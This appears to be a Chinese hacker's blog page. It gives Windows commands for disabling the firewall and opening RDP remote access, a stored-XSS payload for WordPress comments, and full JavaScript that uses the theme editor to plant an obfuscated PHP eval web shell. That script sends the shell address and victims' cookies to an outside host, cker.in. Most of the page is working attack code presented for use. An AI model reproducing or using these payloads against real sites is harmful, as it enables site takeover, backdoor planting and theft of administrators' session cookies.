1、《鸟哥的私房菜(服务器架设篇)》30%

2、《黑客与画家》完!

3、《史蒂夫·乔布斯传完!

4、《黑客大曝光:Web应用程序安全(原书第三版)》30%

More...

Win08+ 防火墙服务名为mpssvc,想停掉防火墙远程登录一般运行如下命令:
C:\Windows\system32>net stop mpssvc
Windows Firewall 服务正在停止.
Windows Firewall 服务已成功停止。

但是在08里 直接停止防火墙的服务后,是不允许3389外连的

所以不能粗暴的停止服务,正确关闭防火墙的命令如下:


关闭WINDOWS防火墙策略:

NetSh Advfirewall set allprofiles state off

开启WINDOWS防火墙策略:

NetSh Advfirewall set allrprofiles state on

查看WINDOWS防火墙策略:

Netsh Advfirewall show allprofiles

请输入密码访问


Windows 2012、Windows 2008 Server命令行开启3389远程桌面,

命令行执行代码:

    wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1

     

    wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
        ######只允许带网络级身份验证的远程桌面的计算机


    //    wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 0
        ######允许任意版本远程桌面的计算机连接(较不安全)


    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

附Windows 2003命令行开启3389一句话命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 

完美payload

<abbr title="qweqw style=display:block;width:9900px;position:absolute;height:9900px;top:-100px;left:-100px; onmouseover=eval(unescape(/with%28document%290%5Bbody.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%2fcker.in%2f2oPaSh%27%5D/.source))// ">

(由于博客程序处理,截断效果的此实体字符显示不出来,&#8220; ,https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/

 

匿名评论后前台触发,覆盖率全屏窗口

 

添加Xsser平台模块的接收参数:shell,用来接收getshell地址

clip_image001[1]

 

xsser平台模块代码(Ajax Getshell)

var xmlHttp;var content404,theme,_wpnonce,content ;

function createXMLHttpRequest() {

if (window.ActiveXObject) {

xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

}

else if (window.XMLHttpRequest) {

xmlHttp = new XMLHttpRequest();

}

}

function doRequest(url) {

createXMLHttpRequest();

xmlHttp.onreadystatechange = handleStateChange;

xmlHttp.open("GET", url, true);

xmlHttp.send(null);

}

function handleStateChange() {

if(xmlHttp.readyState == 4) {

//alert(xmlHttp.responseText)

content404 = xmlHttp.responseText;

theme = new RegExp("<input type=\"hidden\" name=\"theme\" value=\"(.+?)\" />").exec(content404)[1]

_wpnonce = new RegExp("<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"(.+?)\" />").exec(content404)[1]

content = new RegExp("(:?aria-describedby=\"newcontent-description\">)([^<]+)").exec(content404)[2]+"<script language=\"php\">fputs(fopen(chr(46).chr(47).chr(65).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(65).chr(93).chr(41).chr(59).chr(63).chr(62));</script>"

//Post code

var data = "_wpnonce="+_wpnonce+"&_wp_http_referer="+window.location.pathname+"&newcontent="+escape(content)+"&action=update&file=404.php&theme="+theme+"&scrollto=10&docs-list=&submit=submit"

doPostRequest("./wp-admin/theme-editor.php",data)

}

}

doRequest("./wp-admin/theme-editor.php?file=404.php")

function doPostRequest(url,data) {

createXMLHttpRequest();

xmlHttp.onreadystatechange = handleStateChangePost;

xmlHttp.open("POST", url, true);

xmlHttp.send(data);

}

function handleStateChangePost() {

if(xmlHttp.readyState == 4) {

//get 404

doRequest2("./index.php?p=9999999999999998888")

}

}

function doRequest2(url) {

createXMLHttpRequest();

xmlHttp.onreadystatechange = handleStateChange3;

xmlHttp.open("GET", url, true);

xmlHttp.send(null);

}

function handleStateChange3()

{

if(xmlHttp.readyState == 4) {

//(function(){(new Image).src="http://cker.in/index.php?do=api&id={projectId}&shell="+document.location.origin+document.location.pathname+"./A.php AAA"}())

//(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php') })()

(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php')+'&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})())})()

}

}

 

 

关于WordPress 4.2 Stored Xss

http://klikki.fi/adv/wordpress2.html

Proof of Concept

Enter as a comment text:

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>